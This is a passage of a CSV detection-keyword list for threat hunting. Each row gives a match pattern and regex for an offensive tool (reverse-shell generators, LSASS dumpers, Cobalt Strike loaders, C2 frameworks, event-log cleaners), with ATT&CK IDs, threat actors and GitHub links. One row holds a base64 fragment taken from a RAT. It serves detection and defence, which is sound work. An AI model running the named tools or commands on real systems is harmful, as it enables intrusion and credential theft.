dump-restore.py*",".{0,1000}python3\sdump\-restore\.py.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*python3 fee.py*",".{0,1000}python3\sfee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*python3 gcr.py*",".{0,1000}python3\sgcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*python3 GetHash.py NtCreateFile*",".{0,1000}python3\sGetHash\.py\sNtCreateFile.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*python3 -m orbitaldump *",".{0,1000}python3\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*python3 -m pwncat -lp*",".{0,1000}python3\s\-m\spwncat\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python3 -m pwncat -m windows -lp*",".{0,1000}python3\s\-m\spwncat\s\-m\swindows\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python3 -m S3Scanner*",".{0,1000}python3\s\-m\sS3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*python3 Ninja.py*",".{0,1000}python3\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*python3 ntlmv1.py *",".{0,1000}python3\sntlmv1\.py\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*python3 pacu.py*",".{0,1000}python3\spacu\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*python3 rsf.py*",".{0,1000}python3\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*python3 scshell*",".{0,1000}python3\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*python3 sitadel*",".{0,1000}python3\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*python3 slip.py*",".{0,1000}python3\sslip\.py.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*python3 st client wss://*",".{0,1000}python3\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python3 st.py*",".{0,1000}python3\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python3*.exe .\nxc*",".{0,1000}python3.{0,1000}\.exe\s\.\\nxc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*python3??/generator.py*",".{0,1000}python3\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3??/PyLoader.py*",".{0,1000}python3\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3_reverse_tcp.py*",".{0,1000}python3_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*python3_reverse_tcp_v2.py*",".{0,1000}python3_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*pywerview.py*",".{0,1000}pywerview\.py.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*pywhisker.py -*",".{0,1000}pywhisker\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pywhisker.py*",".{0,1000}pywhisker\.py.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*pywhisker-main*",".{0,1000}pywhisker\-main.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*pywsus.py*",".{0,1000}pywsus\.py.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*",".{0,1000}Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa*",".{0,1000}Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*QAX-A-Team/EventCleaner*",".{0,1000}QAX\-A\-Team\/EventCleaner.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*qtc-de/remote-method-guesser*",".{0,1000}qtc\-de\/remote\-method\-guesser.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*QUAPCInjectAsSystem*",".{0,1000}QUAPCInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectElevated*",".{0,1000}QUAPCInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectWithoutPid*",".{0,1000}QUAPCInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*quentinhardy*msdat*",".{0,1000}quentinhardy.{0,1000}msdat.{0,1000}","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","9","803","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z" "*quser.x64.o*",".{0,1000}quser\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*quser.x86.o*",".{0,1000}quser\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 